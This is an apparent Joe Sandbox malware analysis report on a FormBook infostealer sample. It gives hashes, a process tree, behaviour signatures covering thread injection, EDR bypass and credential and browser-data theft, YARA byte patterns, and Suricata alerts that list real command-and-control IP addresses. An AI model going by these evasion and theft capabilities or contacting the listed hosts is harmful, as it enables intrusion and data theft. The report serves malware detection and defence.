Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
N2Qncau2rN.exe

Overview

General Information

Sample name:N2Qncau2rN.exe
renamed because original name is a hash value
Original sample name:d649d0beff04be12fbad6cdb84d0f2460208309f845c890f0fa162a27d61051f.exe
Analysis ID:1529035
MD5:47d011ced9bd433871f605c662c06b55
SHA1:fd2e3100dcad95fd1fc6614a71ba0ac15bd3b05e
SHA256:d649d0beff04be12fbad6cdb84d0f2460208309f845c890f0fa162a27d61051f
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • N2Qncau2rN.exe (PID: 6404 cmdline: "C:\Users\user\Desktop\N2Qncau2rN.exe" MD5: 47D011CED9BD433871F605C662C06B55)
    • svchost.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\N2Qncau2rN.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • auuGcaPMTDojV.exe (PID: 7152 cmdline: "C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RpcPing.exe (PID: 4080 cmdline: "C:\Windows\SysWOW64\RpcPing.exe" MD5: F7DD5764D96A988F0CF9DD4813751473)
          • auuGcaPMTDojV.exe (PID: 1432 cmdline: "C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6424 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1409f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x16b09e:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x15312d:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e423:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f223:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\N2Qncau2rN.exe", CommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", ParentImage: C:\Users\user\Desktop\N2Qncau2rN.exe, ParentProcessId: 6404, ParentProcessName: N2Qncau2rN.exe, ProcessCommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", ProcessId: 6828, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\N2Qncau2rN.exe", CommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", ParentImage: C:\Users\user\Desktop\N2Qncau2rN.exe, ParentProcessId: 6404, ParentProcessName: N2Qncau2rN.exe, ProcessCommandLine: "C:\Users\user\Desktop\N2Qncau2rN.exe", ProcessId: 6828, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T15:33:37.818114+020020507451Malware Command and Control Activity Detected192.168.2.9605493.33.130.19080TCP
            2024-10-08T15:34:01.420541+020020507451Malware Command and Control Activity Detected192.168.2.96057574.208.236.2580TCP
            2024-10-08T15:34:14.561340+020020507451Malware Command and Control Activity Detected192.168.2.9606573.33.130.19080TCP
            2024-10-08T15:34:28.651115+020020507451Malware Command and Control Activity Detected192.168.2.9607283.33.130.19080TCP
            2024-10-08T15:34:43.504908+020020507451Malware Command and Control Activity Detected192.168.2.960821203.175.9.12880TCP
            2024-10-08T15:34:56.674011+020020507451Malware Command and Control Activity Detected192.168.2.9608353.33.130.19080TCP
            2024-10-08T15:35:15.289129+020020507451Malware Command and Control Activity Detected192.168.2.960839199.192.19.1980TCP
            2024-10-08T15:35:29.515917+020020507451Malware Command and Control Activity Detected192.168.2.960843208.91.197.2780TCP
            2024-10-08T15:36:04.387734+020020507451Malware Command and Control Activity Detected192.168.2.960847156.242.132.8280TCP
            2024-10-08T15:36:25.860953+020020507451Malware Command and Control Activity Detected192.168.2.96085184.32.84.3280TCP
            2024-10-08T15:36:39.447772+020020507451Malware Command and Control Activity Detected192.168.2.9608553.91.127.11680TCP
            2024-10-08T15:36:52.998866+020020507451Malware Command and Control Activity Detected192.168.2.960859195.161.68.880TCP
            2024-10-08T15:37:06.473050+020020507451Malware Command and Control Activity Detected192.168.2.960863194.58.112.17480TCP
            2024-10-08T15:37:20.988426+020020507451Malware Command and Control Activity Detected192.168.2.96086715.197.204.5680TCP
            2024-10-08T15:37:35.160910+020020507451Malware Command and Control Activity Detected192.168.2.960871154.23.184.24080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T15:33:37.818114+020028554651A Network Trojan was detected192.168.2.9605493.33.130.19080TCP
            2024-10-08T15:34:01.420541+020028554651A Network Trojan was detected192.168.2.96057574.208.236.2580TCP
            2024-10-08T15:34:14.561340+020028554651A Network Trojan was detected192.168.2.9606573.33.130.19080TCP
            2024-10-08T15:34:28.651115+020028554651A Network Trojan was detected192.168.2.9607283.33.130.19080TCP
            2024-10-08T15:34:43.504908+020028554651A Network Trojan was detected192.168.2.960821203.175.9.12880TCP
            2024-10-08T15:34:56.674011+020028554651A Network Trojan was detected192.168.2.9608353.33.130.19080TCP
            2024-10-08T15:35:15.289129+020028554651A Network Trojan was detected192.168.2.960839199.192.19.1980TCP
            2024-10-08T15:35:29.515917+020028554651A Network Trojan was detected192.168.2.960843208.91.197.2780TCP
            2024-10-08T15:36:04.387734+020028554651A Network Trojan was detected192.168.2.960847156.242.132.8280TCP
            2024-10-08T15:36:25.860953+020028554651A Network Trojan was detected192.168.2.96085184.32.84.3280TCP
            2024-10-08T15:36:39.447772+020028554651A Network Trojan was detected192.168.2.9608553.91.127.11680TCP
            2024-10-08T15:36:52.998866+020028554651A Network Trojan was detected192.168.2.960859195.161.68.880TCP
            2024-10-08T15:37:06.473050+020028554651A Network Trojan was detected192.168.2.960863194.58.112.17480TCP
            2024-10-08T15:37:20.988426+020028554651A Network Trojan was detected192.168.2.96086715.197.204.5680TCP
            2024-10-08T15:37:35.160910+020028554651A Network Trojan was detected192.168.2.960871154.23.184.24080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T15:33:53.420266+020028554641A Network Trojan was detected192.168.2.96055174.208.236.2580TCP
            2024-10-08T15:33:55.974521+020028554641A Network Trojan was detected192.168.2.96055274.208.236.2580TCP
            2024-10-08T15:33:58.518622+020028554641A Network Trojan was detected192.168.2.96055974.208.236.2580TCP
            2024-10-08T15:34:07.984460+020028554641A Network Trojan was detected192.168.2.9606113.33.130.19080TCP
            2024-10-08T15:34:10.398319+020028554641A Network Trojan was detected192.168.2.9606273.33.130.19080TCP
            2024-10-08T15:34:12.054678+020028554641A Network Trojan was detected192.168.2.9606413.33.130.19080TCP
            2024-10-08T15:34:21.140669+020028554641A Network Trojan was detected192.168.2.9606793.33.130.19080TCP
            2024-10-08T15:34:23.564525+020028554641A Network Trojan was detected192.168.2.9606983.33.130.19080TCP
            2024-10-08T15:34:25.192247+020028554641A Network Trojan was detected192.168.2.9607153.33.130.19080TCP
            2024-10-08T15:34:36.000173+020028554641A Network Trojan was detected192.168.2.960775203.175.9.12880TCP
            2024-10-08T15:34:38.444808+020028554641A Network Trojan was detected192.168.2.960788203.175.9.12880TCP
            2024-10-08T15:34:41.093787+020028554641A Network Trojan was detected192.168.2.960807203.175.9.12880TCP
            2024-10-08T15:34:49.003817+020028554641A Network Trojan was detected192.168.2.9608323.33.130.19080TCP
            2024-10-08T15:34:51.548045+020028554641A Network Trojan was detected192.168.2.9608333.33.130.19080TCP
            2024-10-08T15:34:54.114725+020028554641A Network Trojan was detected192.168.2.9608343.33.130.19080TCP
            2024-10-08T15:35:07.426657+020028554641A Network Trojan was detected192.168.2.960836199.192.19.1980TCP
            2024-10-08T15:35:10.238944+020028554641A Network Trojan was detected192.168.2.960837199.192.19.1980TCP
            2024-10-08T15:35:12.826861+020028554641A Network Trojan was detected192.168.2.960838199.192.19.1980TCP
            2024-10-08T15:35:21.277375+020028554641A Network Trojan was detected192.168.2.960840208.91.197.2780TCP
            2024-10-08T15:35:23.849037+020028554641A Network Trojan was detected192.168.2.960841208.91.197.2780TCP
            2024-10-08T15:35:26.372438+020028554641A Network Trojan was detected192.168.2.960842208.91.197.2780TCP
            2024-10-08T15:35:36.363602+020028554641A Network Trojan was detected192.168.2.960844156.242.132.8280TCP
            2024-10-08T15:35:39.453234+020028554641A Network Trojan was detected192.168.2.960845156.242.132.8280TCP
            2024-10-08T15:35:42.000108+020028554641A Network Trojan was detected192.168.2.960846156.242.132.8280TCP
            2024-10-08T15:36:18.221807+020028554641A Network Trojan was detected192.168.2.96084884.32.84.3280TCP
            2024-10-08T15:36:20.739145+020028554641A Network Trojan was detected192.168.2.96084984.32.84.3280TCP
            2024-10-08T15:36:23.290927+020028554641A Network Trojan was detected192.168.2.96085084.32.84.3280TCP
            2024-10-08T15:36:31.833598+020028554641A Network Trojan was detected192.168.2.9608523.91.127.11680TCP
            2024-10-08T15:36:34.378358+020028554641A Network Trojan was detected192.168.2.9608533.91.127.11680TCP
            2024-10-08T15:36:36.958949+020028554641A Network Trojan was detected192.168.2.9608543.91.127.11680TCP
            2024-10-08T15:36:45.350125+020028554641A Network Trojan was detected192.168.2.960856195.161.68.880TCP
            2024-10-08T15:36:47.872321+020028554641A Network Trojan was detected192.168.2.960857195.161.68.880TCP
            2024-10-08T15:36:50.434708+020028554641A Network Trojan was detected192.168.2.960858195.161.68.880TCP
            2024-10-08T15:36:58.822777+020028554641A Network Trojan was detected192.168.2.960860194.58.112.17480TCP
            2024-10-08T15:37:01.358985+020028554641A Network Trojan was detected192.168.2.960861194.58.112.17480TCP
            2024-10-08T15:37:03.925498+020028554641A Network Trojan was detected192.168.2.960862194.58.112.17480TCP
            2024-10-08T15:37:12.998557+020028554641A Network Trojan was detected192.168.2.96086415.197.204.5680TCP
            2024-10-08T15:37:15.516621+020028554641A Network Trojan was detected192.168.2.96086515.197.204.5680TCP
            2024-10-08T15:37:18.064555+020028554641A Network Trojan was detected192.168.2.96086615.197.204.5680TCP
            2024-10-08T15:37:27.559782+020028554641A Network Trojan was detected192.168.2.960868154.23.184.24080TCP
            2024-10-08T15:37:30.080815+020028554641A Network Trojan was detected192.168.2.960869154.23.184.24080TCP
            2024-10-08T15:37:32.875337+020028554641A Network Trojan was detected192.168.2.960870154.23.184.24080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: N2Qncau2rN.exeReversingLabs: Detection: 71%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: N2Qncau2rN.exeJoe Sandbox ML: detected
            Source: N2Qncau2rN.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: auuGcaPMTDojV.exe, 00000003.00000000.1802625939.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4125799190.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: N2Qncau2rN.exe, 00000000.00000003.1657483680.0000000004690000.00000004.00001000.00020000.00000000.sdmp, N2Qncau2rN.exe, 00000000.00000003.1659461075.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1785147049.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787099857.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.000000000359E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1889918613.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1885758983.00000000028BC000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002C30000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.1850301385.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850352705.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000003.2198579685.00000000007DB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: N2Qncau2rN.exe, 00000000.00000003.1657483680.0000000004690000.00000004.00001000.00020000.00000000.sdmp, N2Qncau2rN.exe, 00000000.00000003.1659461075.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1888606997.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1785147049.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787099857.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.000000000359E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000005.00000002.4129055443.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1889918613.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1885758983.00000000028BC000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002C30000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.1850301385.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850352705.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000003.2198579685.00000000007DB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000005.00000002.4129603004.000000000325C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4127083272.00000000027C2000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185961069.000000000D58C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000005.00000002.4129603004.000000000325C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4127083272.00000000027C2000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185961069.000000000D58C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0048C4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0048C4E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 4x nop then xor eax, eax5_2_00479B20
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 4x nop then mov ebx, 00000004h5_2_02B304E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60559 -> 74.208.236.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60552 -> 74.208.236.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60551 -> 74.208.236.25:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60549 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60549 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60627 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60575 -> 74.208.236.25:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60575 -> 74.208.236.25:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60657 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60657 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60611 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60715 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60698 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60728 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60728 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60641 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60679 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60775 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60788 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60807 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60821 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60821 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60832 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60833 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60835 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60835 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60836 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60837 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60838 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60842 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60843 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60849 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60848 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60843 -> 208.91.197.27:80
